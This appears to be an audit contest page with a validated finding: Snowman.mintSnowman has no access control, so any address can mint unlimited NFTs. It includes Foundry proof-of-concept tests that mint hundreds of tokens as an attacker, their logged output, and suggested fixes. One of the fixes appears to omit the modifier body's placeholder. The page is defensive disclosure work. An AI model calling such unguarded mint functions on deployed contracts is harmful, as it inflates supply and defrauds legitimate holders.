Snowman Merkle Airdrop

AI First Flight #10

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

H-01] Permissionless `Snowman.mintSnowman` allows anyone to mint unlimited NFTs, bypassing the entire airdrop mechanism

cthan

[H-01] Permissionless `Snowman.mintSnowman` allows anyone to mint unlimited NFTs, bypassing the entire airdrop mechanism

Description

Snowman.mintSnowman is the function the airdrop uses to mint NFTs to a verified claimer (called by SnowmanAirdrop.claimSnowman after the Merkle proof, EIP-712 signature, and Snow balance checks all pass). However, the function declares no access modifier — the contract inherits Ownable but never applies onlyOwner, and there is no integration check tying the caller to the airdrop contract:

// src/Snowman.sol:36-44

function mintSnowman(address receiver, uint256 amount) external {

for (uint256 i = 0; i < amount; i++) {

_safeMint(receiver, s_TokenCounter);

emit SnowmanMinted(receiver, s_TokenCounter);

s_TokenCounter++;

}

Any externally-owned account or contract can call Snowman(snowmanAddr).mintSnowman(self, N) directly, skipping every validation step the airdrop is supposed to gate on. The Merkle root, the EIP-712 signature scheme, the Snow staking — all of it is irrelevant if anyone can mint NFTs without proving eligibility.

Risk

Likelihood: High — single permissionless call, no preconditions, no cost beyond gas; works against any deployment of this contract immediately after launch.
Impact: High — unbounded NFT supply, complete bypass of the airdrop's eligibility gating, breaks the protocol's core invariant ("Snowman supply is gated by Snow balance + Merkle eligibility").
Risk = Likelihood × Impact = High

Impact

An attacker mints themselves an unlimited number of Snowman NFTs without holding any Snow tokens, providing any Merkle proof, or producing any signature. NFT supply becomes effectively infinite; airdrop fairness is destroyed; the value of legitimately-claimed NFTs collapses to zero because rarity and scarcity are no longer enforced. The protocol's "Recipients stake their Snow tokens and receive Snowman NFTs equal to their Snow balance" invariant is violated on the first malicious call.

Proof of Concept

Full PoC at .audit/poc/PoC_H-01.t.sol. The key test function:

function test_Exploit_H01_UnrestrictedMint() public {

// ARRANGE: attacker is a random EOA — not the deployer/owner, not the airdrop contract,

// not present in any Merkle tree.

uint256 balanceBefore = snowman.balanceOf(attacker);

assertEq(balanceBefore, 0, "attacker should start with 0 NFTs");

// ACT: attacker calls mintSnowman directly — no proof, no signature, no Snow tokens.

vm.prank(attacker);

snowman.mintSnowman(attacker, 999);

// ASSERT: attacker now owns 999 NFTs minted in a single direct call.

assertEq(snowman.balanceOf(attacker), 999, "attacker should hold 999 NFTs after unrestricted mint");

assertEq(snowman.ownerOf(0), attacker, "token 0 should be owned by attacker");

assertEq(snowman.getTokenCounter(), 999, "token counter should be 999");

}

Test passes inside hardened audit container (forge exit 0). Attacker mints 999 NFTs in a single transaction with no proof, signature, or Snow balance — the entire airdrop mechanism is bypassed.

Recommended Mitigation

Bind mintSnowman to the airdrop contract via an immutable reference and an onlyAirdrop modifier, set in the constructor:

contract Snowman is ERC721, Ownable {

address public immutable i_airdrop;

error SM__OnlyAirdrop();

modifier onlyAirdrop() {

if (msg.sender != i_airdrop) revert SM__OnlyAirdrop();

}

constructor(string memory _SnowmanSvgUri, address _airdrop)

ERC721("Snowman Airdrop", "SNOWMAN") Ownable(msg.sender)

{

if (_airdrop == address(0)) revert SM__NotAllowed();

i_airdrop = _airdrop;

s_SnowmanSvgUri = _SnowmanSvgUri;

}

function mintSnowman(address receiver, uint256 amount) external onlyAirdrop {

// unchanged loop body

}

This restores the protocol's intended access pattern: only SnowmanAirdrop.claimSnowman (after running its Merkle + signature + balance checks) can mint NFTs.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 6 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!